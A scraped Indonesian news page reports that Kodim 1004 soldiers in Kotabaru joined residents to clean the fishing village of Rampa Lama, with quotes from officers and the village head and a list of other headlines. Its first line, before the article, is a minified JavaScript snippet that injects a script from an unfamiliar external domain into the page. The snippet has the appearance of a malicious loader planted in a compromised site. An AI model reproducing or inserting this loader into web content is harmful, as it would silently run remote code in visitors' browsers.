(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Ini Yang Dikerjakan Dandim 1004 Bersama Pasukan di Kampung Nelayan Rampa


KOTABARU, Terlihat pemandangan berbeda di kawasan Desa Rampa Lama Kecamatan Pulau Laut Utara yang merupakan kampung dengan mayoritas penduduknya adalah nelayan. Sabtu (11/11), Dandim 1004 Letkol Arh Samujiyo beserta dengan jajarannya seperti Pasi Intel Kodim Kapten Inf Wayan Mustika dan Pasiter dan anggota TNI AD turun guna membersihkan wilayah tersebut.

Sekedar diketahui, area kampung tersebut dalam setiap minggunya rutin dilakukan gotong royong untuk membersihkan lingkungan agar bukan hanya terlihat bersih melainkan juga memupuk kesadaran terhadap masyarakatnya bersama-sama menjaga lingkungan.

Dandim 1004 Lektol Arh Samujiyo mengatakan, kegiatan kerja bakti tersebut dalam rangka Gerakan Nasional Indonesia Bersih (GNIB) tahun 2017 yang dilaksanakan oleh satuan Kodim 1004 Kotabaru.

“Rangkaian kegiatan GNIB diantaranya adalah membersihkan sampah dan menyapu jalan disepanjang wilayah gang 27 Juni khususnya pada RT 12 dan 13. Selain itu juga, membersihkan tempat ibadah yakni Langgar Ar-Rahim serta melakukan pengecatan ulang agar terlihat lebih indah dan membersihkan ruangan didalam area lokasi ibadah tersebut,” tuturnya.

Senada dengan itu, Pasiter Kodim 1004 Kapten Inf Kiswanto menambahkan, tujuan dari kegiatan itu adalah mampu menjadi pelopor bagi masyarakat dalam peningkatan kesadaran hidup sehat menjaga lingkungan agar tetap bersih dan kesejahteraan masyarakat Desa Rampa Lama.

“Ini juga sebagai wujud kepedulian TNI AD terhadap Pemerintah Daerah Kotabaru sebagai percepatan program budaya bersih lingkungan dan meningkatkan kemanunggalan TNI bersama rakyat,” katanya.

Kepala Desa Rampa Lama Samsir Alam merasa bangga dan berterimakasih khususnya kepada jajaran Kodim 1004 yang turun langsung membersihkan kampung nelayan bersama-sama warga.

“Saya berharap kedepan kebersemaan antara TNI AD dan rakyat ini terus berlangsung dan tetap terjalan dengan baik, dan tentunya juga dengan kegiatan ini tentunya TNI adalah mitra dan pelopor masyarakat,” ujarnya. “Semoga kegiatan ini juga tidak hanya sampai disini saja. Akan tetapi, terus berjalan untuk menumbuhkan kepedulian masyarakat terhadap lingkungan,” tandasnya. (fauzi)

Foto : fauzi


Desy Arfianty

Recent Posts

Terselip Nama Aditya, PKB Keluarkan Rekomendasi 65 Calon Kepala Daerah

DPP PKB: Belum Ada Satu Rekomendasi Pun untuk Gubernur Read More

3 jam ago

Petani di HSU Dibekali Pelatihan Penggunaan Pestisida Terbatas

KANALKALIMANTAN.COM, AMUNTAI - Memanfaatkan herbisida aktif parakuat diklorida secara optimal dengan mengurangi dampak sekecil mungkin,… Read More

4 jam ago

BBPOM Gelar Bimtek Keamanan Pangan untuk Kader KPS Se-Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bimbingan Teknis (Bimtek) Keamanan Pangan untuk Kader Keamanan Pangan Sekolah (KPS) se-Kabupaten… Read More

5 jam ago

Hattrick PLN Raih Laba Bersih, Keuangan Terbaik Sepanjang Sejarah Perseroan

KANALKALIMANTAN.COM, JAKARTA - PT PLN (Persero) sukses membukukan keuntungan terbesar sepanjang sejarah perseroan dengan meraih… Read More

6 jam ago

Aeris Hotel Kadung Operasi, Wali Kota Banjarbaru Tak Akan Halangi Investasi

Catatan Dinas Terkait: Daya Tampung Parkir, Laik Sehat, Persetujuan Lingkungan, dan Limbah B3 Read More

8 jam ago

Ancar-ancar Poros Acil Odah-Rozanie di Pilgub Kalsel, Pesaing Muhidin-Hasnur

Rozanie Klaim Dapat Restu Surya Paloh saat Paman Birin ke Nasdem Tower Read More

8 jam ago

This website uses cookies.